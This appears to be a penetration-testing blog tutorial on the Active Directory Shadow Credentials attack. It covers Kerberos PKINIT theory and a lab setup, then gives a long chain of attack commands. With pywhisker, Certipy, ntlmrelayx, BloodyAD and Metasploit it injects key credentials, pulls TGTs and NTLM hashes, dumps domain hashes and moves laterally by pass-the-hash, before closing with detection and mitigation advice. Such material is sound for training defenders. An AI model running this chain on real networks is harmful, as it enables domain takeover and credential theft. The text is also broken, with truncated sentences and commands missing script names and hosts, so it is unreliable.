In this post, we explore the exploitation technique known as the Shadow Credentials attack. This attack leverages the mismanagement or exploitation of Active Directory Certificate Services (AD CS) to inject custom certificates into a user account, granting attackers persistent access. By modifying the msDS-KeyCredentialLink attribute, adversaries can effectively create "shadow credentials" that allow them to authenticate as the target user without needing their password or NTLM hash.
The post outlines lab setup, exploitation
methods, and mitigation techniques, mapped to the MITRE ATT&CK framework
for clarity. Detection mechanisms and actionable recommendations are also
provided to help security professionals identify and defend against this
prevalent threat.
Table of Contents
Shadow Credentials
Lab Setup
Method for Exploitation – AS-REP
Roasting Attack (T1558.004)
ldap_shell tool
Post Explotation
Detection & Mitigation
Introduction to Kerberos Authentication
Kerberos is a trusted authentication
protocol used in Active Directory to securely verify the identity of users and
services. It uses tickets to reduce the need for transmitting passwords over
the network.
Symmetric Encryption in Kerberos
In traditional Kerberos authentication,
symmetric encryption is used. Here's how it works:
- AS-REQ (Authentication Service Request): The client sends a request to the Key Distribution Center
(KDC), including a timestamp encrypted with a key derived from the user’s
- AS-REP (Authentication Service Response): The KDC validates the timestamp using the user’s stored hash
and returns a Ticket Granting Ticket (TGT) encrypted with the KDC’s secret
- TGS-REQ and TGS-REP: The client
uses the TGT to request access to a service, and the KDC issues a service
While symmetric encryption is effective, it
relies on shared secrets (passwords) and is not suitable for scenarios
requiring public key infrastructure (PKI), such as smart card authentication.
Asymmetric Encryption with PKINIT
PKINIT (Public Key Cryptography for Initial Authentication):
PKINIT (Public Key Cryptography for Initial Authentication) is an extension of
Kerberos that uses asymmetric encryption. Instead of relying on passwords, it
uses public-private key pairs for authentication.
PKINIT Certificate Authentication:
Uses a traditional X.509 certificate and private key pair to authenticate a
Kerberos client. The KDC directly validates the certificate.
PKINIT Key Trust: Relies on a
public key stored in the msDS-KeyCredentialLink attribute of an AD object.
The KDC authenticates the client by verifying that the public key used in the
authentication request matches the one stored in the AD object, without needing
a traditional certificate.
Here’s how it works:
- AS-REQ with PKINIT: The client
sends a request to the KDC, including a timestamp signed with the client’s
private key and the corresponding public key.
- Public Key Validation: The KDC
checks the client’s public key against the msDS-KeyCredentialLink
attribute in Active Directory. Means, instead of directly using the
certificate for authentication, the KDC is validating if any of the public
keys in the msDS-KeyCredentialLinkattribute of the user matches
the one used in the AS-REQ. If the key is valid, the KDC decrypts the
timestamp and verifies the signature.
- AS-REP: If validation is
successful, the KDC issues a TGT to the client.
The msDS-KeyCredentialLink Attribute
In simple terms, PKINIT introduces the msDS-KeyCredentialLink
attribute in Windows Server 2016 to store public keys for authentication. This
attribute is crucial for certificate-based authentication, and here are its key
1. The
msDS-KeyCredentialLink is a multi-value attribute, meaning multiple public keys
can be stored for a single account, often representing different devices linked
to that account.
2. Each
value in this attribute contains serialized objects called Key Credentials.
These objects include:
· Creation date
· Distinguished name of the owner
· A GUID representing a Device ID
· The public key itself
3. During
PKINIT authentication, the client’s public key is verified against the values
stored in this attribute. If a match is found, the KDC proceeds with
4. Managing
and modifying the msDS-KeyCredentialLink attribute is an action that requires
specific permissions, typically held by accounts that are members of highly
privileged groups.
These groups include:
Key Admins:
members of this group can perform administrative actions on key objects within
the domain. The Key Admins group applies to the Windows Server operating system
in Default Active Directory security groups.
Enterprise Key Admins: members of this group can perform administrative actions on key
objects within the forest.
Domain Admins: members of this group have almost all the privileges within a
domain, including the ability to modify attributes.
5. It is
important to note that user objects can’t edit their
own msDS-KeyCredentialLink attribute, while computer objects
can. On the other hand, computer objects can edit their
own msDS-KeyCredentialLink attribute but can only add a KeyCredential
if none already exists.
How Shadow Credentials Work
The Shadow Credentials attack takes
advantage of improper permissions on the msDS-KeyCredentialLink attribute,
allowing attackers to inject their own public key into the attribute of a
target user or computer account. Once this is done, they can impersonate the
target account using PKINIT.
Here is how the attack works step by step:
Step 1: Identify Target Permissions
The attacker identifies an Active Directory
object (such as a user or computer account) where they have permissions to
modify attributes. Permissions like GenericWrite or GenericAll are
required to modify the msDS-KeyCredentialLink attribute.
Step 2: Inject the Attacker’s Public Key
The attacker adds their own public key to
the msDS-KeyCredentialLink attribute of the target account. This process
essentially “registers” the attacker’s key as a valid authentication method for
the target.
Step 3: Generate a Certificate
The attacker creates a certificate in PFX
format using the private key associated with the injected public key. This
certificate is now tied to the target account.
Step 4: Authenticate as the Target
With the generated certificate, the
attacker authenticates to the domain using PKINIT. The KDC validates the
attacker’s public key against the msDS-KeyCredentialLink attribute and issues a
Ticket Granting Ticket (TGT) for the target account.
Step 5: Impersonate Users or Escalate
Using the TGT, the attacker can:
- Perform lateral movement within the network.
- Use the S4U2self protocol to impersonate other users.
- Extract NTLM hashes from the Privilege Attribute Certificate
Windows Server 2019 as Active
Directory that supports PKINIT
Domain must have Active
Directory Certificate Services and Certificate Authority configured.
Kali Linux
Tools: PyWhishker, Impacket, certipy-ad,
BloodyAD, Metasploit, ldap_shell
Windows 10/11 – As Client
Lab Setup
In this lab setup, we will create a user
named 'Krishna' and elevate its privileges by adding it to the Key Admins and
Enterprise Key Admins groups. This setup will showcase how attackers can
exploit the msDS-KeyCredentialLink attribute to perform a Shadow Credentials
attack, demonstrating privilege escalation and unauthorized persistent access.
Create the AD Environment:
To simulate an Active Directory
environment, you will need a Windows Server as a Domain Controller (DC) and a
client machine (Windows or Linux) where you can run enumeration and
exploitation tools.
Domain Controller:
· Install Windows Server (2016 or 2019 recommended) that supports
· Promote it to a Domain Controller by adding the Active
Directory Domain Services role.
· Set up the domain (e.g., ignite.local).
· The domain must have Active Directory Certificate Services
and a Certificate Authority configured.
User Accounts:
Create an AD user account
named Krishna.
net user krishna Password@1 /add /domain
Add 'Krishna' User to Privileged Groups:
Once your AD environment is set up, you
need to add Krishna user to the Key Admins and Enterprise Key
Admins security groups.
· Open Active Directory Users and Computers (ADUC) on the
Domain Controller.
· Enable the Advanced Features view by clicking on View
> Advanced Features.
· Locate User Krishna in the Users container.
· Right-click on Krishna User and go to Properties.
· Go to the Member Of tab and click on Add button
· In the “Enter the object name to select” box, type Key
Admins and Enterprise Key Admins and click Check
Names and click on OK
· Apply the settings.
Bloodhound – Hunting for Weak Permission
Use BloodHound to Confirm Privileges: You can use BloodHound to
verify that Krishna have the ability to write to the
"msds-KeyCredentialLink" property on DC.IGNITE.LOCAL
-u krishna -p Password@1 -ns -d ignite.local -c All
From the graphical representation of
Bloodhound, the tester would like to identify the Reachable high value targets
for selected user.
Thus, it has shown the Krishna User have
the ability to write to the "msds-KeyCredentialLink" property
on DC.IGNITE.LOCAL. Writing to this property allows an attacker to
create "Shadow Credentials" on the object and authenticate as the
principal using Kerberos PKINIT.
Method for Exploitation
Attackers can exploit the
msDS-KeyCredentialLink attribute by injecting rogue public keys into a target
user's account.
From UNIX-like systems,
the msDs-KeyCredentialLink attribute of a user or computer target can
be manipulated with the pyWhisker tool.
Clone the repository and install:
install pywhisker
git clone
python3 install
List all the
current KeyCredential IDs and their creation times associated
with the DC$ object.
pywhisker -d ignite.local -u
"krishna" -p "Password@1" --target "DC$" --action
At this point of time, it shows that
attribute msDs-KeyCredentialLink is empty.
The exploitation phase begins with
populating the msDS-KeyCredentialLink attribute.
PyWhishker add functionality, will
generates a public-private key pair and adds a new key credential to the target
object DC$.
The output will specify the PFX file (and
associated password) where the certificate is stored. This will be required in
the next step to obtain a Kerberos TGT (ticket-granting-ticket) for the machine
account using PKINIT.
pywhisker -d "ignite.local" -u
"krishna" -p "Password@1" --target "DC$" --action
"add" --filename DC$
After adding the new key, rerun the list
command to confirm the key has been successfully added. This time, the output
will show the newly created KeyCredential ID, along with its creation
time, including the Device ID of the new key.
pywhisker -d ignite.local -u
"krishna" -p "Password@1" --target "DC$" --action
PyWhishker info command can be used to retrieve
detailed information about the newly added KeyCredential linked to the DC$
object, identified by the Device ID.
pywhisker -d "ignite.local" -u
"krishna" -p "Password@1" --target "DC$" --action
"info" --device-id e9c84cef-af24-9755-8ce3-67088fd3d280
obtain a Kerberos TGT (ticket-granting-ticket) for the machine account
Request a TGT using the PFX file that we
generated using whisker’s add functionality. This uses Kerberos PKINIT and will
output a TGT into the specified ccache. It will also print the AS-REP
encryption key which you may need for the tool.
python -cert-pfx
"/root/DC$.pfx" -pfx-pass eK2PeOlwG60EkPS2TNxX ignite.local/dc$
Set the KRB5CCNAME environment
variable to point to the previously generated dc$.ccache file
Utilize to retrieve the
machine account's NTLM hash
The tool utilizes Kerberos U2U
(User-to-User) to submit a TGS (Ticket Granting Service) request for the
attacker, which includes the PAC (Privilege Attribute Certificate). The PAC
contains the NT hash for the targeted account, and the tool decrypts it using
the AS-REP key that was used to obtain the TGT (Ticket Granting Ticket). This
allows the attacker to extract the NTLM hash for further exploitation, such as
Pass-the-Hash attacks.
python -key
As an alternative, Certipy can automate
these steps in a single command, streamlining the exploitation process.
Certipy's shadow command has
an auto action, which will add a new Key Credential to the target
account, authenticate with the Key Credential to retrieve the NT hash and a TGT
for the target, and finally restore the old Key Credential attribute.
certipy-ad shadow auto -u
krishna@ignite.local -p Password@1 -account dc$
to set shadow credentials on the computer object, ntlmrelayx can be used.
We will launch ntlmrelayx with the
“–shadow-credentials” option and the “–shadow-target” parameter set to the name
of the computer account that we are expecting to relay (in this case, DC$)
impacket-ntlmrelayx -t
ldap:// --shadow-credentials --shadow-target 'dc$'
Trigger a callback via browser, using
krishna user’s credentials.
After a brief wait, we receive an HTTP
connection from the DC$ computer account along with its NTLM credentials. These
credentials are then relayed to the LDAP service on the domain controller and
the msDS-KeyCredentialLink attribute of the relayed computer account is
obtain a Kerberos TGT (ticket-granting-ticket) for the machine account
python3 PKINITtools/
-cert-pfx vX3iEoe3.pfx -pfx-pass 5SwBdP4py1IG9kDhh2nk ignite.local/dc$
Set the KRB5CCNAME environment
variable to point to the previously generated shadow.ccache file
export KRB5CCNAME=shadow.ccache
Utilize to retrieve the
machine account's NTLM hash
python PKINITtools/ -key 44ca95c94d0cb47212d3ee5ff27b9cf8a48a5cd113f0120a3178112e4af16f48
Alternatively, BloodyAD tool can be used
to add Shadow Credentials to the msDS-KeyCredentialLink attribute of the target
object (DC$) in the domain ignite.local
bloodyAD --host -u krishna
-p Password@1 -d ignite.local add shadowCredentials DC$
The above command generated certificate
fille along with private key in pem file format
obtain a Kerberos TGT (ticket-granting-ticket) for the machine account
python3 PKINITtools/
-cert-pem CVU5WmSJ_cert.pem -key-pem CVU5WmSJ_priv.pem ignite.local/DC$
Set the KRB5CCNAME environment
variable to point to the previously generated raj.ccache file
export KRB5CCNAME=raj.ccache
Utilize to retrieve the
machine account's NTLM hash
python -key
This module can read and write the
necessary LDAP attributes to configure a particular account with a Key
Credential Link. This allows weaponizing write access to a user account by
adding a certificate that can subsequently be used to authenticate. In order
for this to succeed, the authenticated user must have write access to the
target object (the object specified in TARGET_USER).
use auxiliary/admin/ldap/shadow_credentials
set rhosts
set username krishna
set password Password@1
set domain ignite.local
set target_user dc$
set rport 636
set ssl true
set action add
Certificate file is stored in the /.msf4/loot
folder. Since the file name is too long we can rename it for our convenience.
The auxiliary/admin/kerberos/get_ticket
module can be used to request TGT/TGS tickets from the KDC.
use auxiliary/admin/kerberos/get_ticket
set rhosts
set action GET_HASH
set domain ignite.local
set username dc$
set cert_file /root/.msf4/loot/dc.pfx
Alternatively, it can be achieved using ldap_shell
ignite.local/krishna:Password@1 -dc-ip
Using DC machine hash, dump the administrator
NTLM hashes from the domain controller. And then perform lateral movement using
psexec or evil-winrm.
Impacket -psexec
Using Impacket’s secretdump script to
extract password hashes.
impacket-secretsdump -hashes
:9df8e4935c53f1a8a007dad9a96232e3 'ignite/dc$@ignite.local' -just-dc-user
Use Impacket’s psexec module to gain access
using pass-the-hash technique
impacket-psexec -hashes
:32196b56ffe6f45e294117b91a83bf38 ignite.local/administrator@
Alternatively, this can be achieved using
Using Impacket’s secretdump script to
extract password hashes.
impacket-secretsdump -hashes
:9df8e4935c53f1a8a007dad9a96232e3 'ignite/dc$@ignite.local' -just-dc-user
Use evil-winrm tool to gain access using
pass-the-hash technique
evil-winrm -i -u
administrator -H 32196b56ffe6f45e294117b91a83bf38
Detection & Mitigation
Detection via Kerberos Authentication Ticket
(TGT) Request
· Event: 4768 – Kerberos Authentication
Ticket (TGT) was requested
· Anomaly: If PKINIT authentication
(Public Key Cryptography for Initial Authentication in Kerberos) is uncommon in
the environment or not typically used for the target account, it may indicate
suspicious behavior.
· Key Indicator: Look for events where
Certificate Information attributes are not blank in the TGT request. This may
suggest the use of certificates for authentication, potentially pointing to
shadow credential abuse or malicious activity.
· Action: Investigate instances where a
TGT is requested with certificate-based authentication in environments where
this is unusual. Scrutinize the certificate attributes in the event to detect
abnormal authentication patterns.
Detection via Active Directory Object
· Event: 5136 – Directory Service Object
Was Modified
· Anomaly: If a System Access Control List
(SACL) is configured to audit Active Directory object modifications for the
targeted account, this event will be triggered when an object is modified (such
as a user or device account).
· Key Indicator: Look for modifications to
the msDS-KeyCredentialLink attribute, which links keys to user or service
accounts. If the modification is performed by an account other than the
legitimate Azure AD Connect synchronization account or the ADFS service
account, this could signal suspicious activity.
· Action: Investigate changes to the
msDS-KeyCredentialLink attribute. Unauthorized modifications may indicate
shadow credentials being tampered with, especially if the modifying account is
not typically associated with key provisioning, such as the Azure AD Connect or
ADFS service accounts.
By monitoring these key events, you can
effectively detect shadow credential attacks and respond to potential security
breaches in your environment.
Regular Audits and Compliance Checks: Regularly audit AD accounts and their attributes to detect shadow
credentials early. Compliance checks should make sure that all key credentials
are valid and necessary. It's also important to know how normal key credentials
are stored, especially for third-party systems. This will help in identifying
suspicious keys.
Implementing Strong Access Controls: Make sure only authorized personnel can modify important attributes
like msDS-KeyCredentialLink by enforcing strict access controls. Use Role-Based
Access Control (RBAC) to limit who has these privileges. Securing these
accounts is crucial because attackers could use them without raising suspicion.
Multi-Factor Authentication (MFA): Implement MFA whenever possible to add an extra layer of security.
This helps reduce the reliance on just one authentication method, making it
harder for rogue key credentials to be used.
Periodic Key Rotation: Regularly rotate keys and credentials to limit how long any
unauthorized shadow credentials can be used. This helps minimize the impact of
any credentials that may have been added without permission.